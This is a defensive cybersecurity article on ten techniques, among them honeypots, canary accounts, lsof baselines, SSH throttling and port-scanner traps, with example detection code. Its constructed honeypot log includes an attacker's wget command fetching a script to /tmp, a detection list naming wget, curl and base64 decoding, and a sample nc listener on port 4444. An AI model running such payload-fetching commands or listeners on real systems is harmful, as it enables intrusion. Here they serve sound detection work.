Zero Trust and 20 Features for Your Cybersecurity P.2

In the first part of this guide, we covered the foundations of modern cybersecurity: Zero Trust principles, access control, network segmentation, monitoring, backups, MFA, and other measures that help reduce the attack surface and make unauthorized access significantly more difficult.

Unfortunately, cybersecurity is an endless race. Any system connected to a network can become a target, and given enough time, resources, or motivation, attackers will eventually find new ways to bypass existing defenses. That's why external cybersecurity is not only about preventing intrusions but also about building infrastructure that remains resilient when prevention alone is no longer enough.

In this second part, we'll look at ten practical techniques that can strengthen your external security posture, improve threat detection, slow down attackers, and reduce the impact of successful compromises. From honeypots and deception technologies to self-healing infrastructure, account lifecycle management, and security awareness programs, these are the kinds of measures that help security teams gain valuable time when it matters most.

If a system can't be hacked, someone probably just switched it off.


The joke is funny. The reality is less so.

If a device is connected to a network, it is vulnerable. Sooner or later, every defensive technology is challenged by an offensive one. External cybersecurity is not just about preventing intrusion attempts; it is also about building an architecture that minimizes risk when attacks inevitably happen.

10 Practical Ways to Improve External Cybersecurity


1. Use Honeypots

The idea: Deploy a decoy host that looks like a legitimate server but exists only to attract, record, and analyze attacks. Nobody has a legitimate reason to touch it, so every connection it receives is suspicious by definition, which makes it an unusually low-noise sensor. It also shows which credentials, tools, and techniques attackers actually try against you, and that feeds straight back into hardening the real infrastructure.

In practice: Use open-source honeypots such as Cowrie (SSH and Telnet) or Dionaea (multi-protocol, built to capture malware samples) to record attacker activity and alert administrators as soon as someone interacts with the decoy. Isolate the honeypot from production (its own VLAN, strict egress filtering): a decoy that is actually compromised must not become a pivot point into the systems it is supposed to protect.
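The value of a honeypot comes from what you do with its logs. The following is an added example, not code from the article or from the Cowrie project: it triages a Cowrie JSON log, summarises which sources, credentials and commands were seen, and turns a successful login or a payload download into an alert. The log lines are constructed for the example and follow the field names Cowrie writes to its JSON output (eventid, src_ip, session, username, password, input); the staging markers and severity thresholds are assumptions to tune for your environment.

```python
"""Triage a Cowrie honeypot JSON log: summarise attacker behaviour, raise alerts.

Added example, not Cowrie's own code. Assumes the field names Cowrie uses in
its JSON log: eventid, src_ip, session, username, password, input.
"""
import json
from collections import Counter, defaultdict

# Constructed sample shaped like Cowrie's JSON output (not a real capture).
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.23","session":"a1","timestamp":"2024-05-01T10:00:01Z"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.23","session":"a1","username":"root","password":"123456"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.23","session":"a1","username":"root","password":"admin"}
{"eventid":"cowrie.login.success","src_ip":"198.51.100.23","session":"a1","username":"root","password":"toor"}
{"eventid":"cowrie.command.input","src_ip":"198.51.100.23","session":"a1","input":"uname -a"}
{"eventid":"cowrie.command.input","src_ip":"198.51.100.23","session":"a1","input":"wget http://203.0.113.5/x.sh -O /tmp/x.sh"}
{"eventid":"cowrie.session.closed","src_ip":"198.51.100.23","session":"a1"}
{"eventid":"cowrie.session.connect","src_ip":"192.0.2.77","session":"b2","timestamp":"2024-05-01T10:05:00Z"}
{"eventid":"cowrie.login.failed","src_ip":"192.0.2.77","session":"b2","username":"admin","password":"admin"}
{"eventid":"cowrie.login.failed","src_ip":"192.0.2.77","session":"b2","username":"root","password":"123456"}
{"eventid":"cowrie.session.closed","src_ip":"192.0.2.77","session":"b2"}
"""

# Command fragments that show the intruder is past reconnaissance and is
# staging a payload; any of these in a session deserves an immediate page.
# (Assumed list; extend it from what your own honeypot sees.)
STAGING_MARKERS = ("wget ", "curl ", "chmod +x", "/tmp/", "base64 -d")


def parse_events(text):
    """Yield one dict per well-formed JSON line; skip blank or truncated lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            yield json.loads(line)
        except json.JSONDecodeError:
            continue


def summarise(text):
    """Aggregate what attackers tried: sources, credentials, commands, logins."""
    sources = Counter()
    creds = Counter()
    commands_by_session = defaultdict(list)
    successes = []
    for ev in parse_events(text):
        kind = ev.get("eventid", "")
        if kind == "cowrie.session.connect":
            sources[ev["src_ip"]] += 1
        elif kind in ("cowrie.login.failed", "cowrie.login.success"):
            creds[(ev.get("username"), ev.get("password"))] += 1
            if kind == "cowrie.login.success":
                successes.append((ev["src_ip"], ev["session"]))
        elif kind == "cowrie.command.input":
            commands_by_session[ev["session"]].append(ev.get("input", ""))
    return {
        "sources": sources,
        "credentials": creds,
        "commands": dict(commands_by_session),
        "successful_logins": successes,
    }


def alerts(text, noisy_source_threshold=5):
    """Return (severity, message) pairs ready to hand to a notifier."""
    out = []
    summary = summarise(text)
    for src_ip, session in summary["successful_logins"]:
        cmds = summary["commands"].get(session, [])
        staging = [c for c in cmds if any(m in c for m in STAGING_MARKERS)]
        if staging:
            out.append(("critical", f"{src_ip} staged a payload on the honeypot: {staging[0]}"))
        else:
            out.append(("high", f"{src_ip} logged into the honeypot ({len(cmds)} commands)"))
    for src_ip, n in summary["sources"].items():
        if n >= noisy_source_threshold:   # one source, many sessions: scanner or brute-forcer
            out.append(("medium", f"{src_ip} opened {n} honeypot sessions"))
    return out


if __name__ == "__main__":
    for sev, msg in alerts(SAMPLE_LOG):
        print(f"[{sev}] {msg}")
    top = summarise(SAMPLE_LOG)["credentials"].most_common(3)
    print("most tried credentials:", top)
```

Run it against the real file (typically `var/log/cowrie/cowrie.json` under the Cowrie install) on a schedule, or tail it, and feed the returned pairs to whatever notification channel you use for critical events. The credential counter is also the cheapest source of a "do not allow these passwords" list for your own systems.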

2. Notifications for Critical Events

The idea: Email is the default alerting channel, but mail can sit unread for hours or land in a filter. Some events, such as a burst of failed logins, a successful login from an unexpected source, or a change to a security-relevant configuration, need a channel that reaches a human within minutes.

In practice: Configure SMS and/or messenger notifications (for example, a Telegram bot; Zabbix ships a Telegram media type and Nagios can call any notification script) using tools such as Zabbix or Nagios so that critical incidents don't go unnoticed. For particularly sensitive systems, automated phone calls can serve as the escalation step. Keep the set of page-worthy events small and well-defined: if everything pages, nothing does.

3. Let Attackers Get Stuck in Honey Passwords


The idea: Create decoy accounts (often called honey accounts or honeytokens) that look valuable, for example names suggesting a backup or service account, but have no access to anything real. Give them the kind of weak password that falls to a spray, or plant the credential where an attacker who has already got in would find it. No legitimate user or process ever uses these accounts, so any authentication attempt against them is a reliable indicator of compromise. It's not a silver bullet, but it's a cheap extra tripwire.

In practice: Monitor these accounts closely. A failed attempt tells you someone is enumerating or guessing account names; a successful one means the planted credential has been picked up and an intrusion is under way. Implement this through authentication logging and automated alerts whenever these credentials are used. Make sure the decoys really have no group memberships, sudo rights, or SSH keys, and exclude them from the inactive-account cleanup described below, or your own automation will quietly remove the tripwire.
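What the detection looks like on a Linux host, as an added example that is not part of the original article: it scans sshd authentication lines for any attempt against a set of decoy account names and grades the hit by whether the attempt succeeded. The decoy account names and the log lines are constructed for the example; the line format is the one OpenSSH writes via syslog, which is an assumption you should check against your own auth.log or journal.

```python
"""Watch sshd authentication logs for any use of decoy (canary) accounts.

Added example, not from the original article. Decoy names and log lines are
constructed; the regex matches OpenSSH's "Accepted/Failed <method> for <user>
from <addr> port <n>" syslog lines.
"""
import re

# Accounts that exist only as bait: no real privileges, never used by staff.
CANARY_ACCOUNTS = {"svc_backup", "oracle_admin", "helpdesk"}

AUTH_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\w+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

# Constructed sample of /var/log/auth.log (or `journalctl -u ssh`) lines.
SAMPLE_AUTH_LOG = """\
May  1 10:00:01 web01 sshd[4021]: Accepted publickey for alice from 10.0.5.12 port 50122 ssh2: ED25519 SHA256:abc
May  1 10:02:17 web01 sshd[4077]: Failed password for invalid user admin from 203.0.113.9 port 51234 ssh2
May  1 10:02:19 web01 sshd[4077]: Failed password for svc_backup from 203.0.113.9 port 51234 ssh2
May  1 10:02:21 web01 sshd[4077]: Accepted password for svc_backup from 203.0.113.9 port 51234 ssh2
May  1 10:03:02 web01 sshd[4090]: Failed password for bob from 10.0.5.40 port 50200 ssh2
"""


def parse_auth_line(line):
    """Return (result, method, user, src) for an sshd auth line, else None."""
    m = AUTH_RE.search(line)
    if not m:
        return None
    return m.group("result"), m.group("method"), m.group("user"), m.group("src")


def canary_hits(text, canaries=CANARY_ACCOUNTS):
    """Flag every authentication attempt against a decoy account.

    A failed attempt already proves someone knows (or guessed) the name; a
    successful one means the planted credential was picked up and must be
    treated as an active intrusion, not a policy violation.
    """
    hits = []
    for line in text.splitlines():
        parsed = parse_auth_line(line)
        if parsed is None:
            continue
        result, method, user, src = parsed
        if user not in canaries:
            continue
        severity = "critical" if result == "Accepted" else "high"
        hits.append({"severity": severity, "user": user, "src": src,
                     "method": method, "result": result})
    return hits


def unique_sources(hits):
    """Addresses that touched any canary, ready for a firewall block list."""
    return sorted({h["src"] for h in hits})


if __name__ == "__main__":
    found = canary_hits(SAMPLE_AUTH_LOG)
    for h in found:
        print(f"[{h['severity']}] {h['result']} {h['method']} for {h['user']} from {h['src']}")
    print("block:", unique_sources(found))
```

Wire `canary_hits` into whatever already tails your logs (a Zabbix log item, a SIEM rule, or a cron job over the last hour of auth.log) and route the "critical" hits to the immediate channel from item 2. Legitimate logins (alice, bob) never appear in the output, which is exactly why the signal is so clean.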

4. Use Native File System Analysis Tools

The idea: Many system administrators prefer the tools already present on the operating system for inspecting what processes are doing with files and sockets, such as lsof (list open files). They are on every host, leave no third-party footprint, and are what you will have to work with during an incident on a machine where you cannot install anything.

In practice: lsof shows which process holds a given file or network port open, and, the other way round, everything a given process has open. That makes it easier to spot an unexpected listening port, a file that was deleted but is still held open by a running process, or a process reading data it has no business touching. The interesting finding is usually the difference from a known baseline of what the host is supposed to expose, so record that baseline while the host is healthy.
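A baseline check built on lsof's machine-readable output, as an added example that is not from the article: it parses the field-per-line format produced by `lsof -nP -iTCP -sTCP:LISTEN -F pcunL` and reports listeners that are not in the expected set, or that belong to a different program than expected. The allowlist and the sample lsof output are constructed for the example; the tag letters (p PID, c command, u UID, L login, n name) are those documented for lsof's -F mode.

```python
"""Baseline check for listening TCP sockets from lsof's -F (field) output.

Added example, not from the article. Parses the output of
    lsof -nP -iTCP -sTCP:LISTEN -F pcunL
where each field is on its own line prefixed by a one-letter tag, and
compares the listeners against an allowlist of what this host should expose.
The allowlist and the sample output below are constructed for the example.
"""
import subprocess

LSOF_CMD = ["lsof", "-nP", "-iTCP", "-sTCP:LISTEN", "-F", "pcunL"]

# What this host is supposed to listen on: port -> expected command name.
EXPECTED = {22: "sshd", 80: "nginx", 443: "nginx", 8089: "gunicorn"}

# Constructed sample of the -F output (not a real capture).
SAMPLE_LSOF = """\
p1234
cnginx
u0
Lroot
f6
n*:80
f7
n*:443
p2201
csshd
u0
Lroot
f3
n*:22
p3410
cpython3
u33
Lwww-data
f5
n0.0.0.0:8089
p3555
cnc
u1001
Ldeploy
f3
n*:4444
"""


def parse_lsof_fields(text):
    """Turn lsof -F output into a list of {pid, cmd, uid, login, addr, port}."""
    records, proc = [], {}
    for line in text.splitlines():
        if not line:
            continue
        tag, value = line[0], line[1:]
        if tag == "p":              # a new process block starts with its PID
            proc = {"pid": int(value)}
        elif tag == "c":
            proc["cmd"] = value
        elif tag == "u":
            proc["uid"] = int(value)
        elif tag == "L":
            proc["login"] = value
        elif tag == "n":            # one record per listening socket
            addr, _, port = value.rpartition(":")   # handles [::1]:6379 too
            records.append({**proc, "addr": addr, "port": int(port)})
        # other tags (f, P, T, ...) carry nothing this check needs
    return records


def unexpected_listeners(records, expected=EXPECTED):
    """Listeners missing from the baseline, or owned by the wrong program."""
    findings = []
    for r in records:
        want = expected.get(r["port"])
        if want is None:
            findings.append(("unknown port", r))
        elif r["cmd"] != want:
            findings.append((f"port {r['port']} owned by {r['cmd']!r}, expected {want!r}", r))
    return findings


def audit_live_host():
    """Run lsof on this machine (root is needed to see other users' sockets)."""
    out = subprocess.run(LSOF_CMD, capture_output=True, text=True, check=False).stdout
    return unexpected_listeners(parse_lsof_fields(out))


if __name__ == "__main__":
    for reason, r in unexpected_listeners(parse_lsof_fields(SAMPLE_LSOF)):
        print(f"{reason}: pid {r['pid']} {r['cmd']} ({r['login']}) on {r['addr']}:{r['port']}")
```

Two findings come out of the sample: a `python3` process on 8089 where the baseline expects `gunicorn` (worth a look: is it the app, or something impersonating it?), and an unlisted `nc` listener on 4444 owned by an ordinary user, which is exactly the kind of thing this check exists to catch. Run it from cron and alert on any non-empty result.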

5. Introduce Delays for SSH Login Attempts

The idea: Limit how many password guesses an SSH brute-force attack can make per connection and per unit of time, so that guessing becomes too slow to be worthwhile.

In practice: Use MaxAuthTries (guesses allowed on one connection before sshd disconnects; default 6) and LoginGraceTime (seconds a client has to finish authenticating; default 120) in sshd_config to cap attempts per connection and stop half-open sessions from tying up the daemon. Neither option inserts a delay between attempts; to actually slow an attacker down, rate-limit new SSH connections at the firewall or run fail2ban, which bans a source after repeated failures appear in the logs. The most effective measure is to disable password authentication entirely and use keys, which leaves nothing to guess.
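The relevant sshd_config lines, as an added example rather than a fragment from the article, with the defaults noted so you can see what each line changes. The values are a reasonable starting point, not a standard; MaxStartups in particular should be sized to how many admins legitimately connect at once.

```conf
# /etc/ssh/sshd_config (only the lines relevant to throttling brute force)

# Guesses allowed on one connection before sshd disconnects (default 6).
MaxAuthTries 3

# Seconds a client has to finish authenticating (default 120).
LoginGraceTime 30

# Throttle unauthenticated connections: once 10 are pending, refuse 30% of
# new ones, rising linearly to 100% when 60 are pending (default 10:30:100).
MaxStartups 10:30:60

# The real fix: accept keys only, so there is no password to guess.
# KbdInteractiveAuthentication is the PAM/challenge path and must be off too
# (on OpenSSH older than 8.7 the directive is ChallengeResponseAuthentication).
PasswordAuthentication no
KbdInteractiveAuthentication no
PermitRootLogin no
```

Validate with `sshd -t` before restarting, and keep your current session open until you have confirmed a fresh key-based login works from a second terminal; an sshd_config typo is the classic way to lock yourself out of a remote box.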

6. Build an "Invisible" Firewall

The idea: Expose management ports (SSH, web consoles, database admin interfaces) only to a short list of administrative source addresses, such as a jump host or the VPN pool, and silently drop everything else. To anyone scanning from another address the port doesn't appear to exist.

In practice: Use iptables, nftables, or firewalld to permit connections to these ports only from the listed addresses, with a default drop policy. Keep the list short and out of public documentation. Remember that this is a control on where a connection comes from, not on who is making it, so the jump host itself needs MFA and hardening, and anyone who compromises it inherits the "invisible" access. Always test a new ruleset from a second session before closing the one you are logged in on.
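What that looks like as an nftables ruleset (nftables is the backend behind iptables-nft and firewalld on current distributions; the addresses, interface and port list are constructed for the example, which is added here and not taken from the article):

```conf
# /etc/nftables.conf (fragment). Admin sources: a jump host and a VPN pool.
define ADMIN_NETS = { 203.0.113.10, 10.20.0.0/24 }

table inet filter {
    chain input {
        type filter hook input priority 0; policy drop;

        iif lo accept
        ct state established,related accept
        ct state invalid drop

        # Management port: only the admin sources may even see it.
        tcp dport 22 ip saddr $ADMIN_NETS accept

        # Public services stay public.
        tcp dport { 80, 443 } accept

        # Anyone else probing the management port gets logged (rate-limited
        # so a scanner cannot flood the log) and then falls through to drop.
        tcp dport 22 limit rate 5/minute log prefix "ssh-probe: "

        # Default: silently dropped, no RST and no ICMP, so an unlisted
        # address sees "filtered", not "closed".
        counter drop
    }
}
```

Load it with `nft -f /etc/nftables.conf` and check the result with `nft list ruleset`. If your admins also reach the host over IPv6, add a matching `ip6 saddr` rule; the `inet` table handles both families, but `ip saddr` only matches IPv4.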

7. Automatically Remove or Disable Inactive Accounts

The idea: Automatically disable or remove accounts that have not been used for a certain period of time. This reduces the risk associated with forgotten, abandoned, or outdated accounts becoming an attack vector.

In practice: Create scripts that regularly check the date of the last login and disable accounts that have remained inactive beyond a predefined threshold. Disable first and delete later: a disabled account keeps its files and audit trail, and a mistake is reversible.

On Linux, the lastlog command reports each user's most recent login (it reads the binary /var/log/lastlog database, so parse the command's output rather than the file itself). A Bash or Python script can use it to find users inactive for a given period and deactivate them. Two details matter: a password lock alone does not stop SSH public-key logins, so also set an account expiry date in the past; and keep an exception list for break-glass and decoy accounts so the cleanup doesn't remove your own tripwires.
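The account cleanup as a runnable script, added here and not taken from the article. It uses `lastlog -b DAYS`, which lists accounts whose last login is older than DAYS (never-logged-in accounts included), filters out system accounts and a documented exception list, and expires each remaining account with `chage -E 0` before locking its password. The sample lastlog and passwd excerpts, the exception names and the UID cut-off are constructed assumptions. Note that newer distributions are replacing lastlog with lastlog2, whose output layout differs, so check the header format on your systems before relying on the parser.

```python
"""Find and disable accounts with no login for N days.

Added example, not from the article. Relies on lastlog(8) (`lastlog -b DAYS`
lists accounts whose last login is older than DAYS) and on chage(1)/usermod(8)
to disable them. The sample outputs below are constructed.
"""
import subprocess

MIN_UID = 1000                       # below this: system accounts, leave alone
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}
KEEP = {"ubuntu", "break-glass"}     # documented exceptions (hypothetical names)

# Constructed `lastlog -b 90` output: header line, then every account whose
# last login is more than 90 days old, including accounts that never logged in.
SAMPLE_LASTLOG = """\
Username         Port     From             Latest
root                                       **Never logged in**
www-data                                   **Never logged in**
jdoe             pts/0    10.0.5.12        Mon Jan  8 09:12:42 +0000 2024
contractor1      pts/1    10.0.5.40        Fri Dec  1 16:40:00 +0000 2023
break-glass                                **Never logged in**
"""

# Constructed /etc/passwd excerpt.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
jdoe:x:1001:1001:John Doe:/home/jdoe:/bin/bash
contractor1:x:1002:1002::/home/contractor1:/bin/bash
break-glass:x:1003:1003::/home/break-glass:/bin/bash
alice:x:1004:1004::/home/alice:/bin/bash
"""


def interactive_users(passwd_text, min_uid=MIN_UID):
    """Human accounts: UID >= min_uid with a real login shell."""
    users = set()
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) < 7:
            continue
        name, uid, shell = parts[0], int(parts[2]), parts[6]
        if uid >= min_uid and shell not in NOLOGIN_SHELLS:
            users.add(name)
    return users


def stale_from_lastlog(lastlog_text):
    """Usernames listed by `lastlog -b DAYS` (first column, header skipped)."""
    lines = lastlog_text.splitlines()[1:]
    return {ln.split()[0] for ln in lines if ln.strip()}


def select_inactive(lastlog_text, passwd_text, keep=KEEP):
    """Accounts to disable: stale, interactive, and not on the exception list."""
    stale = stale_from_lastlog(lastlog_text)
    return sorted((stale & interactive_users(passwd_text)) - keep)


def disable_commands(user):
    """Expire the account first, then lock the password.

    `usermod -L` on its own only prefixes the password hash, and SSH
    public-key logins keep working. An expiry date in the past (chage -E 0)
    is checked on every login path, so it closes key-based access as well.
    """
    return [["chage", "-E", "0", user], ["usermod", "-L", user]]


def run(days=90, dry_run=True):
    """Disable every account inactive for `days`; prints instead of acting by default."""
    lastlog = subprocess.run(["lastlog", "-b", str(days)],
                             capture_output=True, text=True, check=True).stdout
    with open("/etc/passwd") as f:
        passwd = f.read()
    for user in select_inactive(lastlog, passwd):
        for cmd in disable_commands(user):
            print(("DRY-RUN " if dry_run else "") + " ".join(cmd))
            if not dry_run:
                subprocess.run(cmd, check=True)


if __name__ == "__main__":
    print(select_inactive(SAMPLE_LASTLOG, SAMPLE_PASSWD))
```

On the sample data the script selects `contractor1` and `jdoe`: `root` and `www-data` are filtered as system accounts and `break-glass` is on the exception list. Run it with `dry_run=True` for a few cycles and review the output before letting it act, and log every account it disables so the change is traceable.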

8. Use Self-Healing Systems

Expert note: This approach is primarily aimed at improving infrastructure availability and resilience. It does not directly enhance cybersecurity, but it can significantly reduce the impact of attacks and other operational issues.

The idea: Implement automated mechanisms that restore services and configuration when failures occur. Kubernetes is built around this principle: if a node fails, the controllers that manage a workload (a Deployment, for example) recreate its pods on healthy nodes in the cluster. (A pod is a container, or a group of containers, scheduled together on the same host and sharing resources such as networking and storage.)

In practice: Use tools such as Consul (health checks and service discovery) together with HashiCorp Nomad (scheduling, and rescheduling of jobs that fail) to restart services automatically when a health check fails. This reduces downtime and the need for manual intervention. One caveat: a self-healing platform will just as faithfully restart a compromised or crashing workload, so pair it with immutable images and alert on abnormal restart counts; a crash loop on an internet-facing service can be an exploitation attempt rather than a bug.

9. Obfuscate Host and Service Names

The idea: Obfuscation means making something harder to interpret. The goal is to keep an attacker from learning a server's purpose from its hostname or service names during reconnaissance. This is a form of "security through obscurity", a principle that is rightly mocked as a primary control but still adds a little friction when layered on top of real ones.

In practice: Instead of naming servers something obvious like webserver01 or db-prod-02, use random or themed names that make identification harder during reconnaissance and scanning. Names such as Zephyr-XR2, Astral-Q5R, Delta-Sigma-42, or Krypton-5Z1 reveal nothing about function. Bear in mind that the name is all this hides: open ports, service banners, and the names in TLS certificates will still tell a scanner what Zephyr-XR2 runs. Just make sure you leave proper documentation for the next administrator :)

10. Port Scanner Traps

The idea: Create fake ports and services that appear to be legitimate and accessible. These services perform no useful function, but they can distract, confuse, and slow down attackers.

In practice: Using tools such as Portspoof, you can configure a system so that port scans return a large number of apparently open ports and services that do not actually exist. Think of it as the painted tunnel from a classic cartoon. The attacker sees what looks like a valid path forward, but it's an illusion.

This creates a misleading picture of your network structure and potential vulnerabilities. An attacker who discovers these fake services may spend a significant amount of time investigating targets that lead nowhere. At the very least, this diverts attention away from real services that may contain exploitable weaknesses.

If the attacker attempts to interact with these decoys, you can log their activity and gain early visibility into reconnaissance efforts or intrusion attempts. The key is not to become overly distracted by script kiddies and automated scanners while doing so :)

You can also use Kippo (originally inspired by Kojoney), an SSH honeypot that captures the actions of attackers attempting unauthorized SSH access, although it is no longer maintained. Its successor is Cowrie, a fork of Kippo that is actively developed, emulates an interactive shell to keep the attacker engaged, and records additional intelligence such as the commands entered and the files downloaded.
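A minimal port-scanner trap in code, as an added example that is neither Portspoof's nor Cowrie's implementation: each decoy port greets the client with a plausible service banner, records the source address and the first bytes the scanner sends, and then drops the connection. The ports, banners and the in-memory event list are constructed for the example; in production you would bind the real low ports (root or CAP_NET_BIND_SERVICE required) and ship the events to syslog or your SIEM. Banner-grabbing scanners will happily record these as live FTP, Telnet and SMTP services; a full version-detection scan will eventually notice they don't talk back, which is where Portspoof's richer signature emulation earns its keep.

```python
"""A minimal port-scanner trap: fake services that log whoever talks to them.

Added example written for this article; not Portspoof's or Cowrie's code.
Each decoy port sends a banner, captures the client's first bytes, logs the
event and closes. Ports, banners and the event store are constructed.
"""
import socket
import socketserver
import threading
import time

# Decoy services: port -> banner a banner-grabbing scanner will record.
# Binding ports below 1024 needs root or CAP_NET_BIND_SERVICE.
DECOYS = {
    21: b"220 (vsFTPd 3.0.3)\r\n",
    23: b"\r\nUbuntu 22.04 LTS\r\nlogin: ",
    25: b"220 mx1.example.com ESMTP Postfix\r\n",
}

EVENTS = []                  # in memory for the example; use syslog/SIEM in production
EVENTS_LOCK = threading.Lock()


class DecoyHandler(socketserver.BaseRequestHandler):
    """Send the banner, capture the probe, log it, and never do anything useful."""

    def handle(self):
        self.request.settimeout(2)
        try:
            self.request.sendall(self.server.banner)
            first = self.request.recv(256)      # what the scanner sends after the banner
        except OSError:                          # timeout or reset: still log the touch
            first = b""
        with EVENTS_LOCK:
            EVENTS.append({
                "port": self.server.server_address[1],
                "src": self.client_address[0],
                "sent": first,
            })


class DecoyServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, address, banner):
        self.banner = banner
        super().__init__(address, DecoyHandler)


def start_decoys(host, decoys=DECOYS):
    """Bind each decoy port and serve it on a background thread."""
    servers = []
    for port, banner in decoys.items():
        srv = DecoyServer((host, port), banner)
        threading.Thread(target=srv.serve_forever, daemon=True).start()
        servers.append(srv)
    return servers


def stop_decoys(servers):
    for srv in servers:
        srv.shutdown()
        srv.server_close()


def wait_for_events(count, timeout=3.0):
    """Block until at least `count` events are logged (handlers run in threads)."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        with EVENTS_LOCK:
            if len(EVENTS) >= count:
                return True
        time.sleep(0.05)
    return False


def probe(host, port):
    """Play the scanner: connect, grab the banner, send something, go away."""
    with socket.create_connection((host, port), timeout=2) as s:
        banner = s.recv(256)
        s.sendall(b"HELP\r\n")
    return banner


if __name__ == "__main__":
    servers = start_decoys("127.0.0.1")      # needs root for ports below 1024
    print(probe("127.0.0.1", 21))
    wait_for_events(1)
    print(EVENTS)
    stop_decoys(servers)
```

Because nothing legitimate ever connects to a decoy port, every entry in `EVENTS` is reconnaissance by definition, which makes it a good feed for the same alerting path as the honeypot and canary accounts above. Filter out your own vulnerability scanner's addresses before alerting, or you will page yourself every patch cycle.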

Knowledge Is Power. Ignorance Is Downtime.


Cybersecurity awareness and employee education should never be treated as a one-time initiative. They need to become a permanent part of the organization's routine.

A real-world example: during the first phishing simulation, roughly 50% of employees fell for the attack. A year later, after mandatory training, that figure dropped to 13%. Six months later—after repeatedly explaining that clicking suspicious links out of curiosity is not a great career move—the success rate of the phishing campaign dropped to 0%.

Here's how to make security awareness part of everyday operations:

Conduct regular training sessions and workshops to improve employees' cybersecurity knowledge. Cover information security fundamentals, current threats, phishing detection, social engineering attacks, and practical defensive measures. Everyone should participate—from finance staff to facilities management.

Explain what phishing, malware, ransomware, DDoS attacks, zero-day vulnerabilities, and social engineering are. Teach practical mitigation techniques: maintaining up-to-date antivirus signatures, keeping software patched, verifying identities when communicating with unfamiliar contacts, using spam filters, filtering network traffic, and identifying malicious emails and links. Naturally, the level of technical detail should differ between accountants and system administrators.

Run regular exercises that simulate real cyberattacks, phishing campaigns, or social engineering attempts so employees can practice their skills in realistic scenarios.

Review the results, analyze mistakes, and identify weak points. Be objective when evaluating outcomes. Improvement rarely happens overnight, but consistent effort produces measurable results.

Invest in your people. One day, good cyber hygiene may be the thing that saves your business.

Final Thoughts


Implementing cybersecurity controls—especially those aimed at mitigating insider threats—can easily make employees' lives more difficult. That's why every security measure should be evaluated carefully. Solving one problem should not create a larger one somewhere else.

Looking at the state of the world today, investing in cybersecurity is no longer optional. What we've covered in this article is only the tip of the iceberg. The field is enormous, but every organization has to start somewhere.

If your budget and business requirements allow it, you should be working toward continuous software updates through Continuous Integration (CI) and Continuous Delivery (CD) practices, deploying standby servers or even secondary data centers, building geographically distributed clusters, integrating DevSecOps methodologies, and strengthening internal security controls. Physical access control systems, clean desk policies, and even the positioning of office monitors away from public walkways all play a role in protecting information.

Put simply, cybersecurity is a constantly evolving discipline. It requires continuous learning, continuous improvement, and constant adaptation. Stay informed about emerging threats and adjust your security strategy to match the realities of today's threat landscape.

Cybersecurity is one of those topics where everyone has a different story, a different lesson learned, or a different scar from a past incident.

Have you used any of these techniques in production? Did they actually help? Or maybe you have a few tricks of your own that didn't make it into this article?

Share your experience in the comments and feel free to ask questions. The best ideas often come from comparing notes with people who have already stepped on the same rake.

And if you'd like to catch future articles without relying on luck and search engines, follow us on LinkedIn. We'll keep exploring infrastructure, cybersecurity, and the occasional way to make life slightly harder for attackers.


